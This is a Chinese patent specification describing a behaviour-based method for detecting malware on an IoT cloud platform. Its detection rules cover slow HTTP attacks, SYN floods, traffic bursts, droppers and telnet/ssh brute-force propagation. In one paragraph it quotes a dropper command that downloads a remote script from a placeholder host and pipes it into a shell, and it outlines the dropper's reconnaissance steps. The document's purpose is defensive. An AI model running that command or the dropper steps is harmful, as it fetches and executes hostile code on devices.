一种恶意软件检测方法、装置、物联网云平台以及计算机可读存储介质与流程

1.本发明涉及软件检测领域，具体而言，涉及一种恶意软件检测方法、装置、物联网云平台以及计算机可读存储介质。


背景技术：

2.目前的安全行业对恶意软件的检测，往往基于特征码的方式进行，即通过确定恶意软件的特征码在特征库中查找对应的恶意软件。
3.上述恶意软件检测方式依赖于特征库，特征库需要实时更新以应对层出不穷的恶意软件，且该种方式仅能检测已知的恶意软件，对于未知恶意软件不具备检测能。由于目前恶意软件的特征码易被修改，当恶意软件的特征码被修改后，则无法对恶意软件进行检测。因此现有技术中，对于恶意软件的检测不够有效。


技术实现要素：

4.本发明的目的在于提供一种恶意软件检测方法、装置、物联网云平台以及计算机可读存储介质，能够有效识别恶意软件。
5.为了实现上述目的，本技术实施例采用的技术方案如下：
6.第一方面，本技术实施例提供了一种恶意软件检测方法，所述方法包括：
7.检测所述应用程序的软件行为；
8.针对所述应用程序的软件行为，确定所述软件行为是否满足预设规则；
9.在所述软件行为满足所述预设规则时，判定所述软件行为对应的应用程序为恶意软件。
10.在可选的实施方式中，所述软件行为包括第一目标报文和第二目标报文的发送行为，所述确定所述软件行为是否满足预设规则的步骤，包括：
11.确定所述软件行为中第一目标报文的第一发送时间与第二目标报文的第二发送时间；
12.确定所述第一发送时间和所述第二发送时间之间的发送时长；
13.在所述发送时长大于第一预设时长且小于第二预设时长时，确定所述软件行为满足预设规则。
14.在可选的实施方式中，所述软件行为包括对外流量的发送行为，所述确定所述软件行为是否满足预设规则的步骤，包括：
15.实时监测单位时间段内，所述软件行为中对外流量的增长值；
16.在所述增长值大于预设增长值的情况下，确定所述软件行为满足预设规则。
17.在可选的实施方式中，所述软件行为包括对外流量的发送行为，所述确定所述软件行为是否满足预设规则的步骤，包括：
18.确定所述对外流量中是否存在处于同步发送状态的流量；
19.在所述软件行为中存在处于同步发送状态的流量的情况下，确定所述处于同步发送状态的流量的数量；
20.在所述处于同步发送状态的流量的数量大于第一预设阈值时，确定所述软件行为满足预设规则。
21.在可选的实施方式中，所述方法还包括：
22.针对每个所述应用程序，确定每个所述应用程序是否执行预设指令；
23.在所述应用程序执行所述预设指令的情况下，确定所述应用程序是否获取所述物联网云平台的架构信息；
24.在所述应用程序获取所述物联网云平台的架构信息的情况下，确定所述应用程序是否传输包含危险信息的恶意文件；
25.若是，则确定该应用程序为恶意软件。
26.在可选的实施方式中，所述软件行为包括对外流量的发送行为，所述确定所述软件行为是否满足预设规则的步骤，包括：
27.检测所述对外流量中与目标端口对应的目标流量；
28.确定所述目标流量中是否存在远程终端协议的请求和安全外壳协议的请求；
29.在所述目标流量中存在远程终端协议的请求和安全外壳协议的请求时，确定所述软件行为满足预设规则。
30.第二方面，本技术实施例提供了一种恶意软件检测装置，所述装置包括：
31.检测模块，用于检测所述应用程序的软件行为；
32.确定模块，用于确定所述软件行为是否满足预设规则；
33.判定模块，用于在所述软件行为满足所述预设规则时，判定所述软件行为对应的应用程序为恶意软件。
34.第三方面，本技术实施例提供了一种物联网云平台，包括存储器和处理器，所述存储器存储有计算机程序，所述处理器执行所述计算机程序时实现恶意软件检测方法的步骤。
35.第四方面，本技术实施例提供了一种计算机可读存储介质，其上存储有计算机程序，该计算机程序被处理器执行时实现所述恶意软件检测方法的步骤。
36.本技术具有以下有益效果：
37.本技术通过检测应用程序的软件行为，确定软件行为是否满足预设规则，在软件行为满足预设规则时，判定软件行为对应的应用程序为恶意软件。由于恶意软件都会包含一些共有的软件行为，基于应用程序的软件行为判定该应用程序是否为恶意软件，从而有效的识别到恶意软件。
附图说明
38.为了更清楚地说明本发明实施例的技术方案，下面将对实施例中所需要使用的附图作简单地介绍，应当理解，以下附图仅示出了本发明的某些实施例，因此不应被看作是对范围的限定，对于本领域普通技术人员来讲，在不付出创造性劳动的前提下，还可以根据这些附图获得其他相关的附图。
39.图1为本发明实施例提供的物联网云平台的方框示意图；
40.图2为本发明实施例提供的一种恶意软件检测方法的步骤流程图之一；
41.图3为本发明实施例提供的一种恶意软件检测方法的步骤流程图之二；
42.图4为本发明实施例提供的一种恶意软件检测方法的步骤流程图之三；
43.图5为本发明实施例提供的一种恶意软件检测方法的步骤流程图之四；
44.图6为本发明实施例提供的一种恶意软件检测方法的步骤流程图之五；
45.图7为本发明实施例提供的一种恶意软件检测方法的步骤流程图之六；
46.图8为本发明实施例提供的一种恶意软件检测装置的结构框图。
具体实施方式
47.为使本发明实施例的目的、技术方案和优点更加清楚，下面将结合本发明实施例中的附图，对本发明实施例中的技术方案进行清楚、完整地描述，显然，所描述的实施例是本发明一部分实施例，而不是全部的实施例。通常在此处附图中描述和示出的本发明实施例的组件可以以各种不同的配置来布置和设计。
48.因此，以下对在附图中提供的本发明的实施例的详细描述并非旨在限制要求保护的本发明的范围，而是仅仅表示本发明的选定实施例。基于本发明中的实施例，本领域普通技术人员在没有作出创造性劳动前提下所获得的所有其他实施例，都属于本发明保护的范围。
49.应注意到：相似的标号和字母在下面的附图中表示类似项，因此，一旦某一项在一个附图中被定义，则在随后的附图中不需要对其进行进一步定义和解释。
50.在本发明的描述中，需要说明的是，若出现术语“上”、“下”、“内”、“外”等指示的方位或位置关系为基于附图所示的方位或位置关系，或者是该发明产品使用时惯常摆放的方位或位置关系，仅是为了便于描述本发明和简化描述，而不是指示或暗示所指的装置或元件必须具有特定的方位、以特定的方位构造和操作，因此不能理解为对本发明的限制。
51.此外，若出现术语“第一”、“第二”等仅用于区分描述，而不能理解为指示或暗示相对重要性。
52.在本技术的描述中，还需要说明的是，除非另有明确的规定和限定，术语“设置”、“安装”、“相连”、“连接”应做广义理解，例如，可以是固定连接，也可以是可拆卸连接，或一体地连接；可以是机械连接，也可以是电连接；可以是直接相连，也可以通过中间媒介间接相连，可以是两个元件内部的连通。对于本领域的普通技术人员而言，可以具体情况理解上述术语在本技术中的具体含义。
53.经过发明人大量研究发现，现有技术中基于特征码的方式对恶意软件进行检测，即获取应用程序的特征码，将特征码与特征库中各特征码进行匹配，在特征库中匹配到对应的特征码时，则确定该应用程序为恶意软件。基于特征的检测方式依赖于特征库。并且特征库需要实时更新以应对层出不穷的恶意软件，这需要投入大量的人力物力，且检测不一定准确，这种方式获得的特征只能是已知恶意软件的特征，而对于未知恶意软件不具备检测能力。此外恶意软件的特征码修改成本较低，因此恶意软件的特征码易被篡改，经过篡改的恶意软件特征码将不能被特征库的规则命中，因此无法对篡改特征码的恶意软件进行检测。
54.有鉴于对上述问题的发现，本实施例提供了一种恶意软件检测方法、装置、物联网
云平台以及计算机可读存储介质，能够通过检测应用程序的软件行为，确定软件行为是否满足预设规则，在软件行为满足预设规则时，判定软件行为对应的应用程序为恶意软件。由于恶意软件都会包含一些共有的软件行为，基于应用程序的软件行为判定该应用程序是否为恶意软件，从而有效的识别到恶意软件，下面对本实施例提供的方案进行详细阐述。
55.本实施例提供一种可以对恶意软件进行检测的物联网云平台。在一种可能的实现方式中，所述物联网云平台可以为用户终端，例如，物联网云平台可以是，但不限于，服务器、智能手机、个人电脑(personalcomputer，pc)、平板电脑、个人数字助理(personal digital assistant，pda)、移动上网设备(mobile internet device，mid)等。
56.请参照图1，图1是本技术实施例提供的物联网云平台100的结构示意图。所述物联网云平台100还可包括比图1中所示更多或者更少的组件，或者具有与图1所示不同的配置。图1中所示的各组件可以采用硬件、软件或其组合实现。
57.所述物联网云平台100包括恶意软件检测装置110、存储器120及处理器130。
58.所述存储器120及处理器130各元件相互之间直接或间接地电性连接，以实现数据的传输或交互。例如，这些元件相互之间可通过一条或多条通讯总线或信号线实现电性连接。所述恶意软件检测装置110包括至少一个可以软件或固件(firmware)的形式存储于所述存储器120中或固化在所述物联网云平台100的操作系统(operating system，os)中的软件功能模块。所述处理器130用于执行所述存储器120中存储的可执行模块，例如所述基于恶意软件检测装置110所包括的软件功能模块及计算机程序等。
59.其中，所述存储器120可以是，但不限于，随机存取存储器(randomaccess memory，ram)，只读存储器(read only memory，rom)，可编程只读存储器(programmable read-only memory，prom)，可擦除只读存储器(erasable programmableread-only memory，eprom)，电可擦除只读存储器(electric erasable programmableread-only memory，eeprom)等。其中，存储器120用于存储程序，所述处理器130在接收到执行指令后，执行所述程序。
60.请参照图2，图2为应用于图1的物联网云平台100的一种恶意软件检测方法的流程图，以下将方法包括各个步骤进行详细阐述。
61.该实施例应用于物联网云平台，物联网云平台与应用程序通信连接。
62.物联网云平台是指通过各种信息传感器、射频识别技术、全球定位系统、红外感应器、激光扫描器等各种装置与技术，实时采集任何需要监控、连接、互动的物体或过程，采集其声、光、热、电、力学、化学、生物、位置等各种需要的信息，通过各类网络接入，实现物与物、物与人的泛在连接，实现对物品和过程的智能化感知、识别和管理。物联网云平台是一个基于互联网、传统电信网等的信息承载体，它让所有能够被独立寻址的普通物理对象形成互联互通的网络。
63.将应用程序与物联网云平台通信连接，基于物联网云平台对应用程序进行检测，确定应用程序是否为恶意软件。
64.步骤201：检测应用程序的软件行为。
65.步骤202：确定软件行为是否满足预设规则。
66.步骤203：在软件行为满足预设规则时，判定软件行为对应的应用程序为恶意软件。
67.需要说明的是，应用程序的软件行为可以为：应用程序中的文档或可执行文件被
用户直接或通过其他处理软件打开时，该应用程序执行的操作。
68.所有的恶意软件都会包含有一些共有的操作，本技术将这种操作称为软件行为，并将这些软件行为抽象为对应的预设规则，凡是当恶意软件的软件行为命中对应的预设规则后，则将其判定为恶意软件。
69.针对物联网云平台的恶意软件一般具有以下特征，例如跨平台性、慢速cc攻击、ddos攻击以及自我传播的特征，基于跨平台性、慢速cc攻击、ddos攻击以及自我传播的特性，设定预设规则。
70.在应用程序的软件行为命中预设规则，则确定应用程序为恶意应用程序。
71.本技术通过检测应用程序的软件行为，确定软件行为是否满足预设规则，在软件行为满足预设规则时，判定软件行为对应的应用程序为恶意软件。由于恶意软件都会包含一些共有的软件行为，基于应用程序的软件行为判定该应用程序是否为恶意软件，从而有效的识别到恶意软件。
72.针对判定应用程序的软件行为是否命中预设规则，针对上述步骤202，在本技术的另一实施例中，如图3所示，提供了一种恶意软件检测方法，具体包括如下步骤：
73.软件行为包括第一目标报文和第二目标报文的发送行为。
74.步骤202-1：确定软件行为中第一目标报文的第一发送时间与第二目标报文的第二发送时间。
75.步骤202-2：确定第一发送时间和第二发送时间之间的发送时长。
76.步骤202-3：在发送时长大于第一预设时长且小于第二预设时长时，确定软件行为满足预设规则。
77.在恶意软件的软件行为为慢速cc攻击时，基于慢速cc攻击的特性设定预设规则，其中，慢速cc攻击可以包括slow header攻击、slow body攻击以及slow read攻击。基于slow header攻击、slow body攻击以及slow read攻击的特性，设定预设规则。
78.slow header攻击的原理是发送http请求时不发送两个完整的\r\n，即第一目标报文和第二目标报文，例如：先发送第一目标报文，直到快要超时时才发送下一组两组完整的\r\n，即第二目标报文，此时服务端会一直保持接收状态占用大量的窗口资源，当这种请求的体量巨大的时，导致服务器宕机、正常用户无法访问等问题。
79.因此，基于slow header攻击的特性，设定判断第一目标报文和第二目标报文之间的发送时间是否大于第一预设时长且小于第二预设时长的预设规则，在软件行为命中该预设规则，则确定应用程序的软件行为满足预设规则。
80.需要说明的是，第二预设时长为服务端的超时时长，第一预设时长为小于第一预设时长的时长，其中，第一预设时长和第二预设时长接近，例如：第二预设时长为60s时，第一预设时长可以设置为50s、55s等，本技术实施例对此不做具体限制。
81.为了保证恶意软件检测的准确性，需要对第二预设时长进行设定。示例性的，服务器设置的默认超时时间为60秒，则第二预设时长的计算方法应该为服务器超时时间-其他时延，其他时延主要包括传输时延、传播时延等。其中最只要的就是tcp握手阶段的耗时以及web容器排队与处理耗时。
82.在另一示例中，第二预设时长可以根据当前路由以及链路质量的不同，第二预设时长动态发生变化。
83.在另一实例中，第二预设时长的设置方式可以为：根据应用程序的请求响应头的server标头判断出目标web容器的种类，获取目标web容器超时时间的一个默认值，在此基础上加1秒后发送数据，观察是否有正常响应，若没有则在默认值的基础上减去传输时延再减1秒后观察是否有正常回显，若有则表示默认值准确，将默认值确定为第二预设时长。
84.需要说明的是，预设规则还可以为：同时满足发送时长大于第一预设时长且小于第二预设时长，且此类数据的数量大于预设数量，则判定软件行为为慢速cc攻击。并为该软件行为设定一个权重，发送第一目标报文和第二目标报文之间的发送时长越接近于第二预设时长，软件行为越容易被判为慢速cc攻击。
85.slow body攻击原理是根据请求头中的content-length标头设置的字节长度来检测请求体是否接收完毕。慢速cc在进行攻击时通常设置一个较大的content-length值，在发送请求体的时，按照单字节进行发送，每个字节之间延时时间无限接近web容器设置的第二预设时长，此时web容器因为一直没有接收到客户端指定长度的请求体，就会一直保持连接直至接收完毕或超时，这样就一直占用了一个http连接。
86.因此，基于slow body攻击，设定判断第一字节，即第一目标报文。和第二字节，即第二目标报文之间的发送时长是否超过第二预设时长的预设规则，在软件行为命中该预设规则，则确定应用程序的软件行为满足预设规则。示例性的，预设规则活该可以为：同时满足第一字节，即第一目标报文，和第二字节，即第二目标报文之间的发送时长是否超过第二预设时长的预设规则，且此类数据的数量大于预设数量，则判定软件行为为慢速cc攻击。
87.slow read类型的攻击是向服务器发送一个正常且合理的read请求，请求一个很大的文件，同时设置tcp的滑动窗口很小，这样服务器就会不断地切割文件以符合请求侧的窗口大小，然后发送，导致要发送的文件长期滞留在服务器的内存中占用大量的资源。
88.针对slow read的特性，通过设定检测软件行为中，在对外流量中检测read请求的tcp滑动窗口大小，判断tcp的滑动窗口是否小于预设窗口值的预设规则，确定请求的文件是否大于预设文件值，在tcp的滑动窗口小于预设窗口值，且请求的文件大于预设文件值，则判定该软件行为为慢速cc攻击，该软件行为对应的应用程序为恶意软件。
89.针对判定应用程序的软件行为是否命中预设规则，针对上述步骤202，在本技术的另一实施例中，如图4所示，提供了一种恶意软件检测方法，具体包括如下步骤：
90.步骤202-4：确定对外流量中是否存在处于同步发送状态的流量。
91.步骤202-5：在软件行为中存在处于同步发送状态的流量的情况下，确定处于同步发送状态的流量的数量。
92.步骤202-6：在处于同步发送状态的流量的数量大于第一预设阈值时，确定软件行为满足预设规则。
93.在恶意软件的软件行为为ddos攻击时，基于ddos攻击的特性设定预设规则。
94.针对ddos攻击则为检测应用程序有没有在单位时间内频繁发起大量的对外流量，如常见的http flood、syn flood、dns flood和各类反射放大攻击等。ddos攻击是一种四层以下的攻击，以syn flood举例，其原理是不断向物联网云平台发送带有syn标志位的tcp握手报文，而对目标主机响应的ack syn报文不予理会，这样目标主机就会一直等待发送方的最终final ack报文，如果等待了超过2msl时间之后仍然没有获得响应则会重发户直接结束握手过程。请求侧在发送了带有syn标志位的请求报文后会进入syn_sent状态，如果观察
到某一个应用程序建立了大量的处于syn_sent状态的连接，则判定该应用工程为恶意软件，且软件行为的ddos攻击。
95.基于ddos攻击的特性，设定检测对外流量中是否包含同步发送状态的流量，且确定同步发送流量的数量，在同步发送流量的数量大于第一预设阈值，则判定软件行为满足预设规则，确定软件行为的应用程序为恶意软件。
96.针对判定应用程序的软件行为是否命中预设规则，针对上述步骤202，在本技术的另一实施例中，如图5所示，提供了一种恶意软件检测方法，具体包括如下步骤：
97.步骤202-7：实时监测单位时间段内，软件行为中对外流量的增长值。
98.步骤202-8：在增长值大于预设增长值的情况下，确定软件行为满足预设规则。
99.恶意软件的攻击行为往往具有突发性的特点，其不进行攻击的时候往往是保持静默状态的，攻击时往往有大量突发的对外流量，其流量时间线呈现脉冲状，而正常的应用程序流量往往是保持在一个固定值左右波动。利用这一点，可以持续监测记录物联网云平台每个应用程序的对外流量时序图，对持续稳定流量判定为正常应用程序，对于出现对突发流量的应用程序判定为恶意软件。
100.为了提高恶意软件检测准确性，可以确定软件行为满足第一预设规则，且软件行为满足第二预设规则，第一预设规则为软件行为中第一目标报文的第一发送时间与第二目标报文的第二发送时间，确定第一发送时间和第二发送时间之间的发送时长。判断发送时长是否大于第一预设时长且小于第二预设时长时，若是，则确定软件行为满足第一预设规则。第二预设规则为软件行为中对外流量的增长值大于预设增长值的情况下，确定软件行为满足第二预设规则，在软件行为同时满足第一预设规则和第二预设规则的情况下，确定软件行为对应的应用程序为恶意软件。
101.在另一实示例中，可以确定软件行为满足第一预设规则，且软件行为满足第二预设规则，确定软件行为满足第一预设规则的第一分值和第一权重，确定软件行为满足第二预设规则的第二分值和第二权重。最终基于第一分值、第一权重、第二分值以及第二权重，计算最终分值，基于最终分值确定软件行为对应的应用程序是否为恶意软件，例如：最终分值大于预设分值时，确定软件行为对应的应用程序为恶意软件。
102.在本技术的另一实施例中，如图6所示，提供了一种恶意软件检测方法，具体包括如下步骤：
103.步骤301：确定应用程序是否执行预设指令。
104.步骤302：在应用程序执行预设指令的情况下，确定应用程序是否获取物联网云平台的架构信息。
105.步骤303：在应用程序获取物联网云平台的架构信息的情况下，确定应用程序是否传输包含危险信息的恶意文件。
106.步骤304：若是，则确定该应用程序为恶意软件。
107.当一台设备被攻击者通过具体手段攻陷后，其往往会在其上安装一个无害的程序，这个程序就被称作dropper，该程序的功能为下载真正的恶意脚本。本技术通过检测dropper行为来检测恶意软件。dropper在物联网设备上安装恶意软件，往往需要以下几个步骤：首先在物联网设备上寻找具有可写可执行权限的文件夹，其次获取物联网设备的系统架构信息，以便针对性释放二进制文件，最后传输恶意文件到物联网设备。
108.因此，基于dropper在物联网设备上安装恶意软件上下载恶意脚本的流程，设定预设规则。确定应用程序是否执行预设指令。在应用程序执行预设指令的情况下，确定应用程序是否获取物联网云平台的架构信息。在应用程序获取物联网云平台的架构信息的情况下，确定应用程序是否传输包含危险信息的恶意文件。
109.dropper执行cat/proc/mounts命令，查看输出的内容中是否包含字符串rw，此时便可监测cat命令或者类似于less、more等命令的执行。为了检测目标设备的架构，drooper通常的做法是解析elf文件头来进行判断，dropper通常会cat一个已知的二进制文件，且使用的是/bin/echo，通过检查e_machine和e_ident字段来找出架构；对真正的恶意软件的下载安装dropper通常可以通过一些简单的命令实现，curl、wget、lynx等，如：wget-q http://test.com/evil.sh-o-|sh，或者通过已经建立的会话来进行文件传输。
110.示例性的，dropper的上述操作均可以通过linux的watch命令被监测。使用watch命令定时执行一段shell脚本来监控上述命令的执行，当该脚本被运行时，如果检测到cat命令被执行，则会在控制台打印cat was been exec并创建一个以catwasbeenexec加当前时间戳作为文件名的空文件，通过检测这类空文件文件名是否存在来监测对应命令是否执行，当检测到上述dropper的命令均被执行，则确定该应用程序为恶意软件。
111.为了避免生成文件过多侵占系统资源，设定文件定时回收，在预设时间间隔后，删除创建的文件。
112.针对判定应用程序的软件行为是否命中预设规则，针对上述步骤202，在本技术的另一实施例中，如图7所示，提供了一种恶意软件检测方法，具体包括如下步骤：
113.步骤202-9：检测对外流量中与目标端口对应的目标流量。
114.步骤202-10：确定目标流量中是否存在远程终端协议的请求和安全外壳协议的请求。
115.步骤202-11：在目标流量中存在远程终端协议的请求和安全外壳协议的请求时，确定软件行为满足预设规则。
116.对于恶意软件的自传播特性，设定对应的预设规则。
117.恶意软件的自传播通常采用的方式是通过telnet或者ssh方式进行暴力扫描破解，而一般的物联网设备默认情况下是不会发送telnet与ssh请求的。
118.因此通过对外流量中与目标端口对应的目标流量，在目标流量中存在远程终端协议的请求和安全外壳协议的请求时，确定软件行为满足预设规则。
119.示例性的：通过检测单位时间内telnet与ssh请求流量最后跟踪到具体的执行软件来判断恶意软件。telnet协议访问的目标端口是23，ssh协议访问的目标端口是22，因此只需在tcp协议中检测目标端口号为22或23的流量就可以筛选出目标异常流量，再跟踪到发送该流量的应用程序。
120.通过流量对恶意软件的定位可以采用下面所述的方法。
121.通过监控流量可以定位到发送流量的端口号，通过端口号使用netstat命令可以定位到对应的进程pid。
122.请参照图8，本技术实施例还提供了一种应用于图1所述物联网云平台100的恶意软件检测装置110，所述恶意软件检测装置110包括：
123.检测模块111，用于检测所述应用程序的软件行为；
124.确定模块112，用于确定所述软件行为是否满足预设规则；
125.判定模块113，用于在所述软件行为满足所述预设规则时，判定所述软件行为对应的应用程序为恶意软件。
126.可选地，所述确定模块112还用于：
127.确定所述软件行为中第一目标报文的第一发送时间与第二目标报文的第二发送时间；
128.确定所述第一发送时间和所述第二发送时间之间的发送时长；
129.在所述发送时长大于或者等于第一预设时长且小于第二预设时长时，确定所述软件行为满足预设规则，其中，所述第二预设时长大于所述第一预设时长。
130.可选地，所述确定模块112还用于：
131.实时监测单位时间段内，所述软件行为中对外流量的增长值；
132.在所述增长值大于预设增长值的情况下，确定所述软件行为满足预设规则。
133.可选地，所述确定模块112还用于：
134.确定所述对外流量中是否存在处于同步发送状态的流量；
135.在所述软件行为中存在处于同步发送状态的流量的情况下，确定所述处于同步发送状态的流量的数量；
136.在所述处于同步发送状态的流量的数量大于第一预设阈值时，确定所述软件行为满足预设规则。
137.可选地，所述装置还包括：处理模块114，所述处理模块114用于：
138.确定所述应用程序是否执行预设指令；
139.在所述应用程序执行所述预设指令的情况下，确定所述应用程序是否获取所述物联网云平台的架构信息；
140.在所述应用程序获取所述物联网云平台的架构信息的情况下，确定所述应用程序是否传输包含危险信息的恶意文件；
141.若是，则确定该应用程序为恶意软件。
142.可选地，所述确定模块112还用于：
143.检测所述对外流量中与目标端口对应的目标流量；
144.确定所述目标流量中是否存在远程终端协议的请求和安全外壳协议的请求；
145.在所述目标流量中存在远程终端协议的请求和安全外壳协议的请求时，确定所述软件行为满足预设规则。
146.本技术还提供一种物联网云平台100，物联网云平台100包括处理器130以及存储器120。存储器120存储有计算机可执行指令，计算机可执行指令被处理器130执行时，实现该恶意软件检测方法。
147.本技术实施例还提供一种计算机可读存储介质，存储介质存储有计算机程序，计算机程序被处理器130执行时，实现该恶意软件检测方法。
148.综上所述，本技术通过检测应用程序的软件行为，确定软件行为是否满足预设规则，在软件行为满足预设规则时，判定软件行为对应的应用程序为恶意软件。由于恶意软件都会包含一些共有的软件行为，基于应用程序的软件行为判定该应用程序是否为恶意软件，从而有效的识别到恶意软件。
149.在本技术所提供的实施例中，应该理解到，所揭露的装置和方法，也可以通过其它的方式实现。以上所描述的装置实施例仅仅是示意性的，例如，附图中的流程图和框图显示了根据本技术的多个实施例的装置、方法和计算机程序产品的可能实现的体系架构、功能和操作。在这点上，流程图或框图中的每个方框可以代表一个模块、程序段或代码的一部分，所述模块、程序段或代码的一部分包含一个或多个用于实现规定的逻辑功能的可执行指令。也应当注意，在有些作为替换的实现方式中，方框中所标注的功能也可以以不同于附图中所标注的顺序发生。例如，两个连续的方框实际上可以基本并行地执行，它们有时也可以按相反的顺序执行，这依所涉及的功能而定。也要注意的是，框图和/或流程图中的每个方框、以及框图和/或流程图中的方框的组合，可以用执行规定的功能或动作的专用的基于硬件的系统来实现，或者可以用专用硬件与计算机指令的组合来实现。
150.另外，在本技术各个实施例中的各功能模块可以集成在一起形成一个独立的部分，也可以是各个模块单独存在，也可以两个或两个以上模块集成形成一个独立的部分。所述功能如果以软件功能模块的形式实现并作为独立的产品销售或使用时，可以存储在一个计算机可读取存储介质中。基于这样的理解，本技术的技术方案本质上或者说对现有技术做出贡献的部分或者该技术方案的部分可以以软件产品的形式体现出来，该计算机软件产品存储在一个存储介质中，包括若干指令用以使得一台计算机设备(可以是个人计算机，服务器，或者网络设备等)执行本技术各个实施例所述方法的全部或部分步骤。而前述的存储介质包括：u盘、移动硬盘、只读存储器(rom，read-only memory)、随机存取存储器(ram，random access memory)、磁碟或者光盘等各种可以存储程序代码的介质。
151.需要说明的是，在本文中，诸如第一和第二等之类的关系术语仅仅用来将一个实体或者操作与另一个实体或操作区分开来，而不一定要求或者暗示这些实体或操作之间存在任何这种实际的关系或者顺序。而且，术语“包括”、“包含”或者其任何其他变体意在涵盖非排他性的包含，从而使得包括一系列要素的过程、方法、物品或者设备不仅包括那些要素，而且还包括没有明确列出的其他要素，或者是还包括为这种过程、方法、物品或者设备所固有的要素。在没有更多限制的情况下，由语句“包括一个
……”
限定的要素，并不排除在包括所述要素的过程、方法、物品或者设备中还存在另外的相同要素。
152.以上所述，仅为本技术的各种实施方式，但本技术的保护范围并不局限于此，任何熟悉本技术领域的技术人员在本技术揭露的技术范围内，可轻易想到变化或替换，都应涵盖在本技术的保护范围之内。因此，本技术的保护范围应所述以权利要求的保护范围为准。